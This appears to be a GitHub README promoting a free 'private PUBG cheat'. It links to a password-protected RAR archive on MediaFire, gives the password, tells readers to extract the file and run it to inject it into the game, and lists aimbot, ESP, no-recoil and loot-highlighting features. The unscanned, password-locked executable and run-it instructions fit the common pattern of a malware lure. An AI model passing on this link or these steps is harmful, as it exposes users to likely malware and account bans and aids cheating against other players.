<a href="https://git.io/typing-svg"><img src="https://readme-typing-svg.demolab.com?font=&duration=2000&pause=100&width=435&lines=DOWNLOAD+FREE+%7C+PRIVATE+PUBG+CHEAT" alt="Typing SVG" /></a>

# Download cheat

|[Download](https://www.mediafire.com/file/87nr7o85po2luoe/Cheat.rar/file)|
|:-------------|
Passwrod: `6666`
-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 6666 )

- Run the file ( Inject )

- Launch the game

- In-game F4+L button

-----------------------------------------------------------------------------------------------------------------------

# System Requirements:

- Supported processors: Intel, AMD
- Supported OS: Windows 10-11 x64
- Supported Builds : ALL

# Functional

![b69375_5c6928d5df274c8d8ed4f4c3867c1311_mv2](https://user-images.githubusercontent.com/125276433/218482310-d41ddca1-94f7-4a0c-8413-e439133f180e.gif)

# Players

- Only visible
- Friends
- Name
- Team
- Line
- Health
- Box 2D
- Skeleton
- Distance
- Spectator count
- Size line skeleton:
- Skeleton draw distance:
- Backlight distance:

# Loot

- Airdrops
- Corpses
- Vehicles
- Weapons:
- Main
- Handgun
- Melee
- Throwable
- Ammunition
- Attachments
- Equipments
- Headgear
- Vest
- Backpack
- Use:
- Heal
- Boost
- Fuel
- Gadget
- Backlight loot distance

# Aim

- Enable aimbot
- No sway
- No recoil
- Do not aim at friends
- Do not aim at knocked players
- Visibility check
- Aim priority:
- Distance
- Crosshair
- Control radius:
- Draw fov circle
- Fov:
- Distance:
- Enable prediction
- Draw aim prediction (Big frame delay
- Bones selection:
- Head
- Neck
- Left elbow
- Right elbow
- Body
- Pelvis
- Left knee
- Right knee
- Bone change time:
- Key selection

# Colors

- Visible players color
- Invisible players color
- My team players color
- Target player color
- Knoked players color
- AI players color
- Airdrops color
- Corpses color
- Vehicles color
- Weapons color
- Ammunition colorAttachments color
- Equipments color
- Use color
- Setting
- Key to disable loot:
- Open menu key:
